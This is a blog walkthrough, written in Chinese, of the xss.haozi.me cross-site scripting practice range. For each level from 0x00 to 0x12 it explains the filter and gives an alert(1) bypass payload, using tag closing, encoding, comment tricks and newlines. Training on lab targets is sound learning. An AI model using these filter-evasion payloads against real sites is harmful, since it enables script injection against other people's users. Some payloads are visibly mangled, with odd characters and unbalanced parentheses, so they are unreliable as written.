xss.haozi.me在线靶机挑战
环境:
直接通过浏览器,访问该网址即可,第一次加载可能比较慢,输入自己名称就可进入。
0x00
第一关没有啥限制,直接使用最简单的弹窗语句进行测试< script>alert(1)< /script >
这一关的输出很明显是在< textarea >标签里面的,但是这个标签只能输入文本,而不能执行相应语句,属于rcdata元素 ,所以只能先将标签闭合,然后进行弹窗
</textarea><script>alert(1)</script><textarea>
0x02
直接先把input标签进行闭合
xxx"><script>alert(1)</script>
0x03
通过查看源码可以看见 这一关是将括号给过滤掉了,也就是说alert()的括号不可以直接打印出来,我首先想到的就是用反引号来替换,然后还有一种就是通过实体编码的方式把()转换一下 这里设计了一个模板字符串的概念需要下去了解一下。
#<script>alert& #40;1& #41;</script>
#<script>alert`1`</script>
0x04
好家伙,上一关我才通过反引号的方式进入绕过,她这一关直接给我过滤了,还好我还有第二招通过编码绕过,试试效果
<svg/onload=alert((1)>
0x05
这一关下面显示的时候将注释符号(–>)过滤成了一个笑脸的表情,我们要想进行我们自己语句就要把注释给闭合上,所以可以使用另一种注释的符号(–!>)从而构造成下面的语句,这里输入时候需要主要注释符的书写
--!><script>alert(1)</script><!--
0x06
查看源码可以知道这里将auto或者on过滤成了_,并且是在input标签输出,所以这里可以将type的值改成imge的形式进行输出,并且使用换行的方式来让语句不以on开头 和=结尾的正则表达式的绕过 所以构造以下的语句进行测试,当然这道题只要是用on开头的事件都是可以的
type="image"src=1 onerror
=alert(1)
0x07
这一关过滤了标签符号啊,所以没有办法写标签,也没有办法闭合。同时把反引号也过滤了。但但是html中img标签是可以不写后面的“>”,因为它有html自动具有一种纠错机制,构造以下语句进行绕过
<img src="1" onerror="alert(1)"
0x08
查看源码可以继续发现本关将输入数据放入在一个<style>
标签中,并过滤了</style>
标签防止我们进行闭合操作。本关的绕过思路是使用换行操作,因为他只识别某一行特定字符进行过滤,但html可以执行不同行的命令,所以使用换行操作进行闭合style标签绕过过滤,语句如下
</style
>
<script>alert(1)</script
0x09
这一关必须以https://www.segmentfault.com为开头,否则不能输入,然后就将script标签闭合在写点击事件就可以了。
https://www.segmentfault.com"></script><svg/onload=alert(1)<script>
0x0B
根据源码可以看见这里它将所有字母转大写。但是我们仍然可以使用编码来转换。
<svg/οnlοad=alert(1)>
0x0C
这一关过滤了script,并且将字母转为大写。感觉跟上一关的差不多,可以用相同语句先尝试一下
<svg/οnlοad=alert(1)>
0x0D
这一关我们可以发现/这个符号被过滤掉了。我们尝试用换行的方式,同时注释掉后面的
alert(1)
–>
0x0F
这一关就是将一些符号进行了编码;但是这也是可以识别的,所以就是将src闭合,然后写弹窗然后将后面注释
aaa’),alert(1)//
0x10
这一关没啥难的,直接用alert弹窗就好了,将我们输入的值当变量传进去了
0x11
这一关可以看见大多数的符号都已经被转换掉了,导致我们在绕过的时候,很多标签都是用不了,这里用到上课老师教的技巧
"),alert(1)//
0x12
这一关将"过滤成了",所以可以使用转义符号将先将\转义,就可以过关了。
\"),alert(1)//
xss.haozi.me在线靶机挑战相关推荐
- 阿里云“7天实践训练营”入门班第二期学习笔记 第五天 在线编程挑战
阿里云"7天实践训练营"入门班第二期学习笔记 第五天 在线编程挑战 吾辈,完全不会编程 以下内容全程来自阿里云社区的大佬分析讲解 原题目 知识点:搜索.字符串.位运算 有一天Jer ...
- 2022 弱口令安全实验室招新赛-靶机挑战记录
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.ubuntu 代码执行getshell 获取webshell 二.server 2008r2 EW 流量代理 ms ...
- 阿里云 ECS 云计算训练营 Day6:在线编程挑战 2nd
这是什么? 我正在参加"阿里云高校师生计划". 除了可以领取长达一年的免费云服务器体验, 在校学生还可以从零开始学习使用云计算,或参与 AI 实训营,最后获得礼品~(详情点我!) ...
- xss靶场、xss.haozi.me靶场详细通关教程
文章目录 前言 预备知识 HTML编码 img的可拓展 各种payload形式 0x00 0x01 0x02 0x03(使用了正则过滤圆括号) 其它解法 0x04(使用正则过滤圆括号和反引号) 0x0 ...
- xss.haozi.me通关教程
10.xss.haozi.me通关教程 0x00 首先整体浏览网站 分别是xss注入点,注入后的HTML代码以及网页源码 构造常规payload: <script>alert(1)< ...
- xss.haozi 思路总结 0x00-0x12
xss刷题网站2 https://xss.haozi.me/ 一个非常可爱的网站.这是网站界面,题目序号是十六进制,一共19道题. 0x00 直接输入<script>alert(1)< ...
- 【day6】阿里云七天实践训练营之在线编程挑战
Jerry的考验 题目概述 有一天Jerry给Tom出了一道题来考验他.Jerry给了Tom一个长度为2n的只包含小写字母的字符串,让Tom将这个字符串任意挑选字符,将其分成两个等长的字符串a和b(对 ...
- 阿里云 ECS 云计算训练营 Day5:在线编程挑战
这是什么? 我正在参加"阿里云高校师生计划". 除了可以领取长达一年的免费云服务器体验, 在校学生还可以从零开始学习使用云计算,或参与 AI 实训营,最后获得礼品~(详情点我!) ...
- DVWA靶机-反射性XSS漏洞(Reflected)
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command I ...
- 渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
操作系统:https://zhuanlan.zhihu.com/p/162865015 1.基于 Windows.Linux.Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali ...
最新文章
- co88 sap 实际结算_SAP中有关差异的一些概念
- char *p 与char p[N]
- 前端传来的图片并保存_C# 将前端传来的图片文件分别以大图和缩略图保存
- promise async 学习笔记
- Failed to bind properties under ‘logging.level‘ to java.util.Map java.lang.String, java.lang.String
- hibernate.connection.release_mode
- extern __shared__
- linux内核编译后 make: 警告:检测到时钟错误.,系统时钟 make: 警告:检测到时钟错误。您的创建可能是不完整的。...
- 【云栖计算之旅】线下沙龙第2期精彩预告:Docker在云平台上的最佳实践
- session一致性架构设计
- hadoop yarn 集群配置
- 汇编语言的强制类型转换
- php制作成绩单,PHP学生成绩查询及分析系统制作
- web网站嵌入QQ临时会话代码 ----转载----小技巧
- 台式计算机能不能安装蓝牙驱动,win7电脑蓝牙驱动怎么安装,详细教您怎么安装...
- 漏洞补丁在线更新失败或软件安装提示ERROR的解决方案
- CentOS7安装杀毒软件ClamAV图形界面ClamTk
- 计算机处理器性能排名,cpu天梯图2018最新版 2018电脑cpu处理器性能排行榜
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
- 中文版Ubuntu系统转为英文版Ubuntu